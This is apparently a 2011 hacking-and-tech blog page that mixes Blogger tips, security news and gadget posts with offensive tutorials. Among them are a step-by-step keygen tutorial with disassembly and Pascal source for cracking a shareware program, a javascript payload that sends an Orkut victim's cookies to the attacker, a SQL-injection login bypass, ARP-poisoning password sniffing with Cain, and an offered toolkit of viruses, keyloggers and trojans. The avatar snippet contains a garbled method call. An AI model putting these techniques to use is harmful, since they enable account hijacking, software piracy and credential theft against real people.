How to Change Default Anonymous Avatar in Blogger Comments

Mar 31, 2011 | comments

Step 1.

If you are using the old Blogger interface:
  • Go to Dashboard - Design - Edit HTML - Expand Widget Template (make a backup)
If you are using the new Blogger interface:
  • Go to Dashboard - Template - Edit HTML - Proceed - Expand Widget Template (make a backup)

Step 2. Find (CTRL + F) this code in your template:

</body>

Step 3. Add the following code just above it:

<script src='http://code.jquery.com/jquery-latest.js'/>
<script>
$(&quot;img[src=&#39;http://img1.blogblog.com/img/anon36.png&#39;]&quot;)
.attr(&#39;src&#39;, &#39;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9UMAv05OEeTkdnv31jsChWQHlZ2RJzKy64KfSQqkmESm2D-GTJhcZKf0jjiOHYLa-BMZBi3rA9moO4rWu3Trj2qPzJT0AffxVo-lRl8a9OvD4GQM2yr-1L8jJP0R3Ko6-4aHVUnY9Sus/s1600/default_avatar.gif&#39;)
.ssyby(&#39;blank&#39;)
</script>
<script src='http://code.jquery.com/jquery-latest.js'/>
<script>
$(&quot;img[src=&#39;http://img2.blogblog.com/img/b36-rounded.png&#39;]&quot;)
.attr(&#39;src&#39;, &#39;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8Ss3Wlx5UcgOzvniTo7uLyNncqMdFi6XbYfp1sXQ6zwqt41RzRYzzLgQCw3_8Wl5VDcAZl79-WXyWiWKf6HNK8Uv80bVIVXPYsWh7nmgpBGI_wwlLvk2byPEcgFB9-jJ_E2cIOhMCLxc/s1600/blogger-user.png&#39;)
.ssyby(&#39;blank&#39;)
</script>

Step 4. Save the Template

How to change avatar:

For Anonymous users: Replace the code in red with the url address of your image
For Blogger users: Replace the URL in blue with your own.

How to make key generators?

Mar 27, 2011 | comments

Hi there, in this tutorial, I intend to teach you how to make a pretty simple keygen, of a program called W3Filer 32 V1.1.3.

W3Filer is a pretty good web downloader...
I guess some of you might know the program.

I`ll assume you know:

A.How to use debugger (in this case, SoftIce).
B.How to crack, generally (finding protection routines,patching them,etc...).
C.How to use Disassembler (This knowledge can help).
D.Assembly.
E.How to code in Turbo Pascal ™.

Tools you`ll need:

A.SoftIce 3.00/01 or newer.
B.WD32Asm. (Not a must).
C.The program W3Filer V1.13 (if not provided in this package), can be found in
www.windows95.com I believe.
D.Turbo Pascal (ANY version).

Well, enough blah blah, let's go cracking...

Run W3Filer 32.
A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now, we notice this program has some kind of serial number (Mine is 873977046). Let's keep the serial in mind, I bet we`ll meet it again while we're on
the debugger.

Well, now, let's put your name and a dummy reg code...
Set a BP on GetDlgItemTextA, and, press OK.
We pop inside GetDlgItemTextA, Lets find the registration routine...

I`ll save you the work, the registration routine is this:
:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]
:00404DB8 52 push edx ---> Your user name here.
:00404DB9 E80B550000 call 0040A2C9 ---> Registration routine.
:00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it.
:00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if
:00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if
OK.

Well, Let's enter the CALL 40A2C9, and see what's inside it:

(Please read my comments in the code).
* Referenced by a CALL at Addresses:
|:00404DB9 , :00407F76
|
:0040A2C9 55 push ebp
:0040A2CA 8BEC mov ebp, esp
:0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0
:0040A2D2 53 push ebx
:0040A2D3 56 push esi
:0040A2D4 57 push edi
:0040A2D5 8B5508 mov edx, dword ptr [ebp+08]
:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]
:0040A2DE 33C0 xor eax, eax
:0040A2E0 EB16 jmp 0040A2F8
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A2FB©
|
:0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the
interesting part.
:0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current
char in the user name, Hmm, 20h=' '...
:0040A2E8 740D je 0040A2F7 ----> Let's see,
:0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop
does, is copying
the user name from
[EDX], to [ESI], WITHOUT the spaces!
(Keep this in mind! ).
:0040A2EC 880C06 mov byte ptr [esi+eax], cl
:0040A2EF 42 inc edx
:0040A2F0 40 inc eax
:0040A2F1 C6040600 mov byte ptr [esi+eax], 00
:0040A2F5 EB01 jmp 0040A2F8
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A2E8©
|
:0040A2F7 42 inc edx
* Referenced by a (U)nconditional or ©onditional Jump at Addresses:
|:0040A2E0(U), :0040A2F5(U)
|
:0040A2F8 803A00 cmp byte ptr [edx], 00
:0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got
what it does,
Let's continue tracing
the code...
:0040A2FD 56 push esi --------> The user name is pushed, in order
to
Upcase it's chars.
* Reference To: USER32.CharUpperA, Ord:0000h
|
:0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in
upper case.
:0040A303 56 push esi -----> Our name in upper case here.
* Reference To: cw3220mt._strlen, Ord:0000h
|
:0040A304 E86F300000 Call 0040D378 ---> This is the length of our name.
:0040A309 59 pop ecx
:0040A30A 8BC8 mov ecx, eax ---> ECX=Length.
:0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST).
:0040A30F 7D05 jge 0040A316 ---> Let's go to this address...
:0040A311 83C8FF or eax, FFFFFFFF
:0040A314 EB67 jmp 0040A37D
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A30F©
|
:0040A316 33D2 xor edx, edx
:0040A318 33C0 xor eax, eax
:0040A31A 3BC8 cmp ecx, eax
:0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless
checking).
===================================================================================
============ FROM HERE AND ON, THE IMPORTANT CODE, PAY ATTENTION ==================
===================================================================================
One thing before we continue, EDX = 00000000h as we enter to the next instructions.
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A333©
|
:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user
name, offset EAX.
:0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h...
(Remember that).
:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in
user name , offset EAX.
:0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the
offset in user name! (Remember that).
:0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was
Shelled (Ding Dong =)).
:0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE
of this registration routine!!!
:0040A330 40 inc eax -----> Increase EAX by one (next char).
:0040A331 3BC8 cmp ecx, eax
:0040A333 7FE9 jg 0040A31E ----> If ECX loop.
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A31C©
|
:0040A335 A120674100 mov eax, dword ptr [00416720] ---> HMMMMMM, What's in
here?????
:0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '?
EAX'
Does this number in EAX look
familiar to us? ;-)
If you still don`t understand,
than, It's
our SERIAL NUMBER! (PLEASE, take
your time, and check by
yourself - don`t trust me!). OK,
so now we know,
That it SHR's EAX by 03 (SAR is
almost identical to SHR).
:0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the
loop, the serial number shr'd by 03h
:0040A33F 52 push edx -------> Let's continue. (At this point, I
can tell you , the reg number, is
in EDX - only that the reg number
is in HEX --> That's how you enter it).
* Possible StringData Ref from Data Obj ->"%lx"
|
:0040A340 685EF54000 push 0040F55E
:0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0]
:0040A34B 52 push edx
* Reference To: USER32.wsprintfA, Ord:0000h
|
:0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes
the value from EDX, and turns it to an hex string).
:0040A351 83C40C add esp, 0000000C
:0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' -
THIS is the reg number! That's enough for us, the rest of
the code, is
just for comparing the correct reg code with ours.
:0040A35A 51 push ecx
* Reference To: USER32.CharLowerA, Ord:0000h
|
:0040A35B E8B8320000 Call 0040D618
:0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0]
:0040A366 50 push eax
:0040A367 FF750C push [ebp+0C]
* Reference To: cw3220mt._strcmp, Ord:0000h
|
:0040A36A E875300000 Call 0040D3E4
:0040A36F 83C408 add esp, 00000008
:0040A372 85C0 test eax, eax
:0040A374 7405 je 0040A37B
:0040A376 83C8FF or eax, FFFFFFFF
:0040A379 EB02 jmp 0040A37D
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A374©
|
:0040A37B 33C0 xor eax, eax
* Referenced by a (U)nconditional or ©onditional Jump at Addresses:
|:0040A314(U), :0040A379(U)
|
:0040A37D 5F pop edi
:0040A37E 5E pop esi
:0040A37F 5B pop ebx
:0040A380 8BE5 mov esp, ebp
:0040A382 5D pop ebp
:0040A383 C3 ret

Making the actual Keygen

~~~~~~~~~~~~~~~~~~~~~~~~

Now, after I've explained how does the program calculate the registration code, you can either write your own keymaker, without looking at my code, or
look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time).

That's it, here's the source of my keygen:

------------------- Cut here ---------------------------------------------

Program W3FilerKeygen;
var
Key,SerialNum,EB,ED,digit:Longint;
I,x:Byte;
Name,KeyHex:String;
begin
Writeln(' W3Filer32 V1.1.3 Keymaker');
writeln('Cracked by ^pain^ ''97 / Rebels!');
Write('Your Name:'); { Read the name }
readln(Name);
Write('Serial Number:');
readln(SerialNum); {Yes, we need the serial number for the calculation!}
Key:=0;
x:=0;
For I:=1 to length(Name) do
begin
Name[I]:=upcase(Name[i]);
If Name[I]<>' ' then begin
eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h}
Ed:=ord(Name[I]); {ED = Name[I]}
ed:=ed*(x); {ED=ED*Offset}
inc(x);
eb:=eb+ed; {Add ED to EB}
Key:=Key+EB; {Add EB to KEY}
end;
end;
Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key}
{ From here, this is just HEX2STRING --> I`m quite sure it's
Self explaintory, else - go and learn number bases again! ;-)}
KeyHex:='';
repeat
digit:=Key mod 16;
key:=key div 16;
If digit<10 then KeyHex:=Chr(Digit+ord('0'))+KeyHex;
If digit>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex;
until key=0;
writeln('Your Key:',KeyHex);
writeln(' Enjoy!');
end.

Phishing Attack Prevention

Mar 21, 2011 | comments

Indiatriks is aware of public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment.

This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks; this method of attack is able to bypass this security mechanism.

We encourages users and administrators to take the following measures to protect themselves from these types of phishing attacks:

* Do not follow unsolicited web links or attachments in email messages.
* Use caution when providing personal information online.
* Verify the legitimacy of the email by contacting the organization directly through a trusted contact method.
* Refer to the Recognizing and Avoiding Email Scams (pdf) document for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.
* Refer to the Using Caution with Email Attachments Cyber Security Tip for more information on safely handling email attachments.

Fake Donation Website blocked

Mar 16, 2011 | comments

Earlier we found a phishing site that poses as a donation site to raise money for the victims of the recent earthquake in Japan. The phishing site http://www.japan{BLOCKED}.com is created by using an open-source social networking system Jcow 4.2.1. It is hosted on the IP address 50.61.{BLOCKED}.{BLOCKED}, which is located in the United States. It is confirmed that the site is still active as of this writing.Such attacks are not uncommon as attacks that leveraged natural disasters such as Hurricane Katrina in 2005, Hurricane Gustav in 2008, Chinese Sichuan earthquake in 2008, the latest attack used the Haiti earthquake in 2010.


source: trendmicro.com/

Microsoft Announces Global Availability of I. Explorer 9

Mar 14, 2011 | comments

Microsoft Corp. announced the launch of the latest version of the world's most-used browser with the release of Windows Internet Explorer 9 in 39 languages at an event at the SXSW Interactive conference. Internet Explorer 9 is Microsoft's most-downloaded browser beta of all time, with more than 40 million downloads, and it has already has gained more than 2 percent usage on Windows 7. Already more than 250 top sites from around the globe are taking advantage of the capabilities in Internet Explorer 9 to deliver differentiated experiences to their customers, with many featured on http://www.BeautyoftheWeb.com. Together, these partners reach more than 1 billion active Internet users on the Web.
Internet Explorer 9 is designed to bring sites front and center through Windows 7, enabling a more immersive, more beautiful Web experience. Features such as Pinned Sites and Jump List enable people to put their websites directly on the Windows 7 Taskbar, as though they were native applications, and then to quickly and easily perform tasks related to those websites, such as check their inboxes, change the music station, accept friend invitations or see breaking news.

In addition to 250 top sites, more than 1,000 other sites and designers are taking advantage of these new features with Internet Explorer 9 and Windows 7. These sites include not only the largest sites on the Web, such as Facebook and Amazon, but also leading experiences from across the Web and the world....

Ongoing attacks target new Adobe Flash Player zero-day flaw

| comments

Adobe Systems Inc. is warning of ongoing attacks targeting a critical zero-day vulnerability in Adobe Flash Player that could enable attackers to gain complete control of an affected computer.

The software maker issued an advisory, Monday, warning that several security vendors have detected Microsoft Excel files containing an embedded malicious Flash file that attempts to exploit the new Flash Player zero-day vulnerability.

Adobe said the hole exists on all supported versions of Adobe Flash Player for Windows, Macintosh, Linux, and Flash Player for Google Chrome and Android platforms. The latest versions of Adobe Reader and Acrobat are also affected. The vulnerable component is also in Adobe Reader X, the latest version of Adobe Reader, but Reader X prevents an attacker from leaving the isolated Adobe Reader sandbox to infect the computer, wrote Brad Arkin, Adobe's senior director of product security and privacy, in the company's blog.

"Reports that we've received thus far indicate the attack is targeted at a very small number of organizations and limited in scope," Arkin said.

Once the vulnerability is exploited the attacker attempts to install persistent malware on the victim's machine, Arkin said. While attacks have been limited to Microsoft Excel files, Arkin said PDF files embedded with malicious code can also be used to exploit the hole.

Adobe is still working on an out-of-cycle patch to repair the flaw. An update will be pushed out to most systems during the week of March 21, Adobe said. Adobe Reader X will be updated in the next quarterly security update for Adobe Reader, currently scheduled for June 14.

In the SecureList blog, Kaspersky Lab senior malware researcher Roel Schouwenberg said cybercriminals have designed the Flash Player attack to easily slip past antispam filters. "From my point of view, this is a clear example of too much functionality in a product leading to security problems," Schouwenberg said, adding that Microsoft or Adobe should take steps to prevent people from embedding Flash (SWF) files in Microsoft Excel.

"Call me old-fashioned, but I don't really see the point of embedded SWFs inside Excel documents," he said.


SOURCE :~Robert Westervelt
searchsecurity.techtarget.com

Waledac botnet cracks 500k email acounts

Mar 13, 2011 | comments

Security researchers have discovered that a botnet
known as Waledac has successfully cracked nearly
500,000 email accounts, and is likely to start using
them to vastly increase its spam activity. This makes the
spam more likely to evade modern filtering techniques,
such as IP blacklisting, as the messages will appear to
originate from legitimate users.
Researchers from security firm Last Line also found
the botnet had details of 124,000 FTP accounts, which
can be used to upload files which then redirect users
to infected sites. These sites can be used to serve
malware, placing the user’s machine under the control
of Waledac. Waledac is the successor to Storm, once
one of the largest botnets in the world. Although
Waledac is currently far smaller than Storm, given the
scale of information at its disposal, this could be set to
change.


Source: ID Theft Protect

Malware hijacking Facebook user accounts

| comments

Facebook is under attack again from the cyber criminal
community. Lolbot.Q malware is using Facebook to
hijack user’s accounts and we’ve just seen Asprox.N
(we do love the names the security vendors give new
malware), is a nasty trojan that comes attached to
an email as a downloadable file which is targeting
Facebook users.
The trojan sends a message that informs you that
your Facebook account is being used to spam other
Facebook accounts and that your password has been
changed.
In order to retrieve the information you have to open
the attached file. The attached file is labelled Facebook_
details.exe which when opened allows the virus to send
spam to your various friends.


Source: ID Theft Protect

Google to use One-Time-Passwords for Gmail

| comments

Google has demonstrated over time to be very serious
about Gmail accounts safety, rolling out more and more
effective features mitigating the number of stolen email
accounts.
One time password are nowadays spread among
Internet banking websites where the so called OTP
token generates a new password every 30 seconds
and adds more security to the username and password
pair.
Google approach to the OTP is slightly different. It
does not replace the user’s login credentials but it adds
a further layer of security to it, providing random security
passwords through your landline phone, mobile phone
or even Skype.
The option can be enabled under Google Accounts
Personal Settings and it’s named Using 2-step
verification. A mobile application named Google
Authenticator will run on the major smartphones
(iPhone, Android, BlackBerry, iPad) to show the one
time password in seconds (3 seconds according to
tests) .
Another great feature is the possibility of creating
ad-hoc accounts for non-web browser applications
that need to login to your Google Account. This is very
common with mobile phones accessing your Google
Reader or your other Google services. Applicationspecific
passwords will shrink the attack surface and
increase the control you have over your account.


Source: Armanod Romeo

Free Ebook

Mar 2, 2011 | comments (3)

Free ebook download
This is absolutely free for all of you !!!!!!!!



Note:-

How to get this ?

1. First comment here with your name n mail id.

2. Join us and Follow us on facebook , g+ and Twitter and tell ur friends about this site or share on your wall . To validate plz write your ID in comment fild.

3. I will send your book absolutely for free.



Note:-
1. Only followers can make request.

2. Only 100 books will be delivered.

HACKING TOOLKIT 2011 RELEASED

| comments (19)

best hacking tools,blackhat toolkit
THE BLACK HAT HACKING TOOLKIT-2011 RELEASED
(100 in 1)
CONTAINS :-
1.HOTMAIL HACKING
2.YAHOO HACKING
3.MSN FUN TOOLS
4.FAKE SCREENS/PAGES
5.XP Killer
6.Sniff Password
7.Port Scanner
8.Fast Resolver
9.Domain Scan
10.Whois Domain
11.NetRes View
12.PHPbb Defacer
13.Angry IP Scanner
14.FTP Brute ForcerPage 5:
15.Hook Tool Box
16.Smart HAck UpLoader
17.Remote Anything
18.NetWork Password Recovery
19.Net BIOS Name Scanner
20.FTP Password Hacker
21.Cable Modem Sniffer
22.Port Listening XP
23.Blue Port Scanner
24.MAgic Password Sender
25.MSN Locker
26.HotMail Killer
27.Hot Freeze
28.MessenPass
29.HotMAil Hack !
30.Ice Cold Reload
31.HotMail Killer 2
32.MSN Chat Monitor And Sniffer
33.MSN Password Retriever
34.MSN Hacker DUC
35.Head **** HotMail HAck
36.MSN Sniffer
37.MSN SPY Lite
38.HotMail Hacker Gold
39.HotMail Hacker XE Edition
40.B-S Spy
41.318 VIRUSES
42.10 BACK DOOR
43.4KEYLOGGER
44.100 TROJENS + 56 MORE TOOLS This is absolutely free FOR YOU !!!!


How to get this ?


1. First comment here with your name n mail id.

2. Join us and Follow us on facebook , g+ and Twitter and tell ur friends about this site or share on your wall .To validate plz write your ID in comment fild.

3. I will send your toolkit absolutely for free.



Note:-
1. Only followers can make request.

2. Only 100 kit will be delivered.

QUAD SIM CELLPHONE

| comments


This is Flying F160 is the world’s first Quad SIM card, quad standby mobile phone. Quite why you’d need four SIM cards in your phone is another matter, although I suppose for permanent travellers this could save a bunch of time swapping out cards when you cross a border.

The rest of the spec is pretty so-so, with a 2 inch touchscreen, TV & FM radio, 0.3 mp camera and a choice of colors. Priced, however, at a very reasonable price $75.00 only.........

BlackBerry Playbook

| comments

BlackBerry maker RIM has seemed a bit lost for the last couple of years, unsure whether to persevere with the style that always served it well or embrace touchscreens wholly. That quandary continues on its phones, but there’s no doubting the focus of the PlayBook tablet.
A brand new operating system, an extremely powerful dual-core processor, all of the usual BlackBerry business features and, perhaps most importantly of all, a real focus on getting third-part developers involved.
The PlayBook is already looking stylish, slick and easy to use. With a carefully crafted tablet operating system and advanced specs, we could be looking at some major competition for the iPad.

GADGETS 2012

| comments

This is a smart pen coming in 2012 may be is capable of writing on any surface and then storing what was just written in to its memory so you can download it later.

GADGETS IN 2012

| comments

HP recently did and came up with a number of drawings and ideas as to what we might be using in 2012. The first is this HP laptop which can be seen above. It has virtual keys, is razor thin and is featherweight. Hopefully virtual keyboards will be easier to use in 5 years time as currently they suck.

How to Trace Hackers

| comments

If you spend a lot of time connected to the Internet, it is only a matter of time before a hacker attempts to gain access to your computer. Proper security and firewalls are usually all that is needed to prevent them from gaining entry, but computer owners who are less focused on system security may have a hacker slipping through their open ports. If you should find yourself in the unfortunate position of dealing with a hacker, just remember that it is entirely possible to identify and track the hacker so his cyber crimes can be reported to the proper authorities.
Instructions:

1. Open the DOS prompt on your computer. The way you get to the DOS prompt depends on what version of Windows you are using. If you are using Windows 95 or Windows 98, click "Start." then click "Programs" and end by clicking "MS-DOS." If you are using Windows NT, Windows 2000 or Windows XP, you will arrive at the DOS prompt differently. In this case, you will click "Start," then click "Run," then type either "cmd" or "command." Windows Vista is the simplest of all, since you only have to click "Start," then type "cmd."

2. Type the following command into the DOS prompt (without quotation marks): "netstat --a." This will open a routine known as Netstat, which will quickly identify all connections into and out of your computer. Typing "netstat --a" will produce a string of information that identifies your IP address, the port your computer is using for the connection, the "foreign address" of the machine you are connected to, the port that machine is using, and also the status of the connection.

3. Identify what other Netstat commands are available to you. Type "netstat ?", without the question marks. This should show you what commands are available in your version of Netstat. Typical commands include --a, -e, -n, -p proto, -r and --s. You can also combine multiple commands at once, as you will do in the following step.

4. Combine two commands to refine your search. First, use the command that identifies all connections and listening ports, which is usually "-a." Second, find the command that lists the information in numerical form, which is usually "-n." Type the command into the DOS prompt as "netstat --an." Note that you may need to change the "a" or "n" to something else, if they are identified differently in your version of Netstat.

5. Search for additional Internet activity. You should only have one connection, using one port. If a hacker has gained access to your system, an additional port will be in use. Running the command from the previous step will allow you to see what IP address the hacker is using, the hacker's hostname and the port number he is connecting through. It is possible to shut down the port and block the IP address, but for the moment, let's trace down who is gaining access to the computer and track what they are doing.

6. Run a trace route on the information you have obtained about the hacker. This affords you an idea of where the individual is located and what ISP he is using to connect to the Internet. Run the trace route by returning to the DOS prompt and typing "tracert ip address/hostname." Remove the quotation marks and replace "ip address" and "hostname" with the relevant information that was gathered in the previous step. Trace route will then trace the path of the connection, including any servers the connect must pass through before reaching you.

7. Print out the information about the intrusion, then use your firewall to block the port and IP address used by the hacker. Send a copy of the information to your local police department, the police department in the location that trace route identified for the hacker, the ISP the hacker uses and to the US Department of Justice's cybercrime website. (Follow the link in Resources.) These organizations may want to have a technician generate a detailed computer log of the intrusion and any past intrusions, so do not delete any log files from your computer.

5 WAYS TO EXPLODE BLOG TRAFFIC

| comments

1. Write. Write stuff. Write stuff people like to read.Most often blogs end up being abused by people who think the world is waiting to know what happens to them every second (I don't deny them this right...they have it!), however the same thing can be presented in a way that forces the reader to continue reading. Simple check! read as though you didn't write it. Funny? worth posting? go ahead post.
2. Article marketing is one of the best and easy way to get targeted traffic for your blog. By writing and submitting articles to article directories, you will not only get backlinks and traffic, but you will also gain the credibility as a writer, which is a most important factor to become a successful blogger. Once you build a reputation as a good writer, the articles you submit in article directories will get more views and increase the number of visitors to your blog via your articles.
3. Discussion forums are a great way to drive traffic to your blog. Most successful bloggers would have used this technique to drive traffic for their blog since discussion forums are a great online marketing tool. The traffic from discussion forums are instant i.e., if you stay active in the forum for a reasonable time and post expert answers to the questions given in there with a backlink to your blog in the signature line, then you will be receiving traffic from these forums immediately.
4. Doing guest posts on another blogs can prove to be a great source of targeted traffic and is also a link building method to help you with the SEO. You just have to write a killer post, so the other blog’s readers will be curious to see who wrote it, but make sure to only write on blogs related to yours, because only targeted traffic matters. If you write on a blog that doesn’t have anything to do with your niche, then nobody will be interested in your blog and they will neither visit yours, or visit it and leave immediately and this can prove to be a real time waster.
5. Submit to Blog Search engines.Most people search for blogs not on the major search engines, but on blog search engines. So make sure your blog has been submitted to these engines. The more the merrier. Search on google for blog search engines and submit your blog to all of these.

How to make free website for newbies

| comments

IN THIS WAY U CAN MAKE A
WEBSITE LIKE-
YOU.co.cc
NOTE-WHEN YOU GO LINKS TO
WEBSITES GIVEN HERE ALL
SIGNUPS ARE FREE
i am going to share that how
make ur own a website.
1}-Gotohttp://www.co.cc
2}-register an account there.and
then activate it from mail u
received from support@co.cc
3}-then search for a domain like-
Hackerlov
and register that domain.{in co.cc
website}
4}-now goto-http://
www.000webhost.com
register there an account.
{they give 1.5 gb space for free
account.
UR ACCOUNT WILL BE ACTIVATED IN
48 HOURS}
5}-they will give you 2 server
names
ns1, ns2.
copy{remember}that names,
6}-again open co.cc and sign in.
7}-in manage domain option fill
server names.
8}-u can add anything to ur
website by going to
000webhost.com and signing in.
AND ENJOY UR FREE WEBSITE.
YOU CAN ALSO USE GOOGLE
ADSENSE FOR UR SITE.

New cookies stealing from mozilla firefox

| comments

New cookies stealing from mozilla firefox to hack gmail or orkutHacking orkut or Gmail.
With the Help of Cookies or by stealing cookies of the victimBy going through this post i hope you will understand how easy has hacking become with the help of cookies.
By this post you'll be learning cookie stealing and Hacking orkut Or Gmail account.
Procedure to hack gmail or orkut through mozilla by stealing cookies:-



* Firstly you need have Mozilla firefox.
* Download cookie editor plugin for Mozilla firefox.
* You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts

Cookie Script:

javascript:nobody=replyForm;nobody.toUserId.value=33444211;

nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?

Action.submit';nobody.submit()


How to use cookies script?

1. Replace your number " UserId.value=33444211 "
How to Replace your Number ????
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg
It will be a Eight Digit Value.
3. Now replace your value with the value in the java script .
4. Now Your script will look like


javascript:nobody=replyForm;nobody.toUserId.value=yournumber;

nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));

nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()


5. Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter
6. You'll Get his cookie in your scrap book
7. After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)
8. click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Scriptput ur eight digit number in the place of (33444211).

Thats it your done With.
Logout of your orkut and login again and you'll be in your victims Homepage

easy way to hack a website for NEWBIES

| comments

If you have the html and javascript knowledge then you can access password protected websites. So you want to know how??

keep reading.....

* Open the website you want to hack. Provide wrong username-password in its log in form.(e.g : Username : me and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be preparedYour experiment starts from here...
* Right click anywhere on that error page =>> go to view source.
* There you can see the html codings with javascripts.
* There you find somewhat like this....<_form data-blogger-escaped-action="..login....">
* Before this login information copy the url of the site in which you are.(e.g :"<_form data-blogger-escaped-..........action="http://www.targetwebsite.com/login.......">")
* Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)
* Then take a close look for "<_input data-blogger-escaped-name="password" data-blogger-escaped-type="password">"[without quotes] -> replace "<_type data-blogger-escaped-text="text"> " there instead of "<_type data-blogger-escaped-password="password">". See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )
* Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:\chan.html)
* Reopen your target web page by double clicking 'chan.html' file that you saved in yourharddisk earlier.
* U see that some changes in current page as compared to original One. Don't get worried.
* Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server's database.

Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes]

The above trick won't work on the websites using latest technique to protect there servers. Still you may find some websites to use this trick.

Enjoy !!!!

How To Defeat The Attempts Of A Black Hat Hacker

| comments

In order to survive in the World Wide Web, there are certain things that we need to know in order to endure. The first one is that each computer user is responsible for his machine and the data that it contains. It doesn't matter if a transnational spends hundreds of millions of dollars in IT security if an absent-minded employee downloads and installs unauthorized software or falls into the email scheme of black hat hackers.

Basic Knowledge :

So, the first thing that we need to know is that computers, and networks, are like houses. If they don't have the windows and doors properly secured, anyone can enter. There are thousands of hackers in the internet looking for computers with unsecured entrances. Even worse, they have programs making the search for them. If you consider that there are hundreds of millions of computers in the world, then it is highly probable that an important percentage of them aren't properly secured.

Firewall :

In order to secure our "house", we need to have a firewall installed and properly configured. A firewall is like a lock that assures that all the entrances to your computer are properly closed, so no one from the outside can access it..

Anti Virus Software :

Another useful piece of software is the antivirus. Antivirus have been around since the first personal computers since viruses have always existed. Unfortunately, the internet has generated a demographic explosion and now they wander, freely, through the net. There are several software packages in the market, so test the ones with which you feel more comfortable and stay with the one that is more convenient for you.

Regular Updates :

The next step is to update your operating system, especially if it is Windows XP. Ninety percent of the worldwide operating system market is owned by Microsoft. For that reason, it is the preferred choice for crackers in the entire world. They are constantly looking for ways to bypass the security of this operating system, looking for weaknesses of all kind (even in something as innocent as the Media Player). In order to stop them, maintain your operating system updated.

Education in Security Techniques :

Finally, if you are inside a company, assure yourself that the users are trained. They must be able to detect if they are being victims of cracker scam. It can be through the internet messaging system, an email or even an innocent looking PowerPoint attachment sent by a friend. People are the last line of defense against black hat hacking.

Over time, black hat techniques have become more advanced and complex. Although there are computer software programs that can help a cracker in many ways, it is still a profession that requires a knack for computer software and hardware. So, as you may have noticed, black hat hackers will never disappear, which means that we need to have our computers, and our networks, prepared.

Stealing passwords in LANs

| comments

Stealing passwords in LANs. Dis article is all abt daStealing passwords from LAN.
Requirement:: CAIN(from http://www.oxid.it/), a computer with ethernet card, and a LAN(obviously!)
Working Principle::

* Install CAIN.
* Now after installation start it.
* go to the configure option in menu bar and in 'SNIFFER' tab choose 'start sniffer on startup' and in 'APR(Arp poison routing)' tab you can fake your ip and mac address .
* Start sniffer by clicking a 'PCB' symbol next to the open button on the toolbar.
* Now in the main pane go to 'Sniffer' and press the '+' button in the toolbar.
* A window will popup select your range and select the 'All tests' option and click ok.
* A list of available hosts is printed.
* Now go to the APR tab in the lower part of the list pane.
* Then go to DOS Prompt, type 'ipconfig /all' without 's and note down the ipaddress of the gateway.
* Select the your target and the default gateway from the list and choose Start.
* Let the app do its work. The whole communication is filtered/routed (sniffed) through your computer.
* While you were ARP Poisoning if the target entered any password which was directed to the default gateway the password will be logged.
